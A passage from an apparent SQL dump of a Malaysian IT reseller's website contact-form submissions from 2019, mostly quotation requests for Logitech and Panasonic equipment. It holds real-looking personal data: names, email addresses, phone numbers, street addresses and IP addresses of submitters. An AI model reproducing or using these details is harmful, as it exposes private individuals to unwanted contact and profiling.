AHMED\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"waqar@gamaluxoils.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0125220337\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"Gamalux Oils Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:61:\"161B Persiaran Pegaga Taman Bayu perdana 41200 Klang Selangor\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:51:\"Logitech BCC950, Screen Share, Group Expansion Mics\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-20 18:19:03','175.143.32.101','1'),(311,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"abdul majid salleh\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"amajidcj@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0103417858\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"aby tech niaga\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"balakong selangor\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:65:\"Logitech Group, Logitech Rally, Logitech MeetUp, Logitech Connect\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:61:\"pls quote me a video conference system for small meeting room\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"55\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-23 14:55:03','118.100.147.142','1'),(312,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"Muhamad Safwan Bin Azmi\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"safwan.skc@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0175648470\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"SKC Education\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:68:\"(SKC Group Level 8) Universiti Tun Abdul Razak 195A, Jalan Tun Razak\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:62:\"Logitech Group, Group Expansion Mics, Group 10m Extended Cable\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-24 17:12:10','110.159.96.151','1'),(313,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:7:\"Shahriz\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"whpowertech.ent@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60173313243\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"WHPOWERTECH ENTERPRISE\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Sri Kembangan\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-25 10:36:26','113.210.107.144','1'),(314,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"MOHD ZAIMI BIN ABU HASSAN\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"zaimi_mutiarasgs@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"01115405818\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"MUTIARA SWITCHGEAR SERVICES\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:88:\"BLOCK H-G-83,PLAZA JELUTONG,NO 5C,PERSIARAN GERBANG UTAMA BUKIT JELUTONG,40150 SHAH ALAM\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:40:\"TOUGHBOOK 33, TOUGHBOOK 31, TOUGHBOOK 54\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"20\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-25 12:22:10','115.135.119.142','1'),(315,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Fion Tong\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"fiontongpeisun@hotmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0122262024\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"Ecom Business Network\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:42:\"request price for video conference devices\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-25 15:25:13','175.139.183.3','1'),(316,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"NGUYEN Thi Bich Ngoc\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"nnguyen9@mantu.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"+84 28 7300 1398\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"AMARIS CONSULTING PVT LTD\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:100:\"We need quotation for IT Hardware devices. Please contact me (via email) for more details. Thank you\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"11\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-01 17:27:15','27.68.135.186','1'),(317,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Lim Chze 